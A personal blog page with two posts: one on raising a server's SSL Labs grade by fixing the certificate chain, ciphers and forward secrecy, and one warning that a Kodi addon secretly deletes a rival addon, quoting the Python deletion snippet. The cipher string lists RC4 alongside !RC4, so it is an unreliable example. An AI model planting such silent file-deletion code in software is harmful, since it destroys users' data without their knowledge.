obsolete cipher (AES_128_CBC with HMAC-SHA1)

With Internet privacy on everyone’s mind. I decided it was time to do some house keeping myself. I ran my main domain through the test at SSL Labs . I ended up with a SSL grade of B- :( wow .




I ran a test via Google chrome and Chrome returned the message “obsolete cipher (AES_128_CBC with HMAC-SHA1) ” . Additionally I ran a quick test via Python and it returned ” raise SSLError(e, request=request)
requests.exceptions.SSLError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:661)”

A few things I had issues with
1) The root chain bundle was missing from the server
2) I was using old ciphers
3) Enabling Perfect Forward Secrecy was disabled
Enabling perfect forward secrecy
After correcting the above , My SSL grade changed to A . Hopefully this information will help those out there. Internet privacy is a big deal these days. Engineers need to do what they can to protect every day users.

Python Test :


import requests
s = requests.get('https://domain.com')
print(s)


Ciphers used
SSLCipherSuite “EECDH+ECDSA+AESGCM EECDH+aRSA+AESGCM EECDH+ECDSA+SHA384 EECDH+ECDSA+SHA256 EECDH+aRSA+SHA384 EECDH+aRSA+SHA256 EECDH+aRSA+RC4 EECDH EDH+aRSA RC4 !aNULL !eNULL !LOW !3DES !MD5 !EXP !PSK !SRP !DSS !RC4”

Kodi Wars Maverick Addon

So there has been some kodi wars with the developers of certain add-ons. One being with Anonymous,Maverick, Silent hunter and Beau builds. The issue I have with some kodi developers. They like you when you follow them and hate you when you decide to create your own repo or addon. The Anonymous team encourages you to clone their addon and make it your own. I also find it funny that most addon owners dont even know Python :/

Please be careful as to which kodi addons you install on your system. Recently Maverick added some code to remove the anonymous addon. This is very unacceptable within the kodi community and he is doing so without the users knowledge. This is on the same lines as creating some type of malware. The code he use is some standard Python code. Nothing major, but the point is he is removing something from a user device without their knowledge.

for root, dirs, file in os.walk(addons):
for dir in dirs:
if 'anonymous' in dir.lower():
path = addons + dir
shutil.rmtree(path)

Be careful out there in the world of Kodi .

Computer , server issues and solutions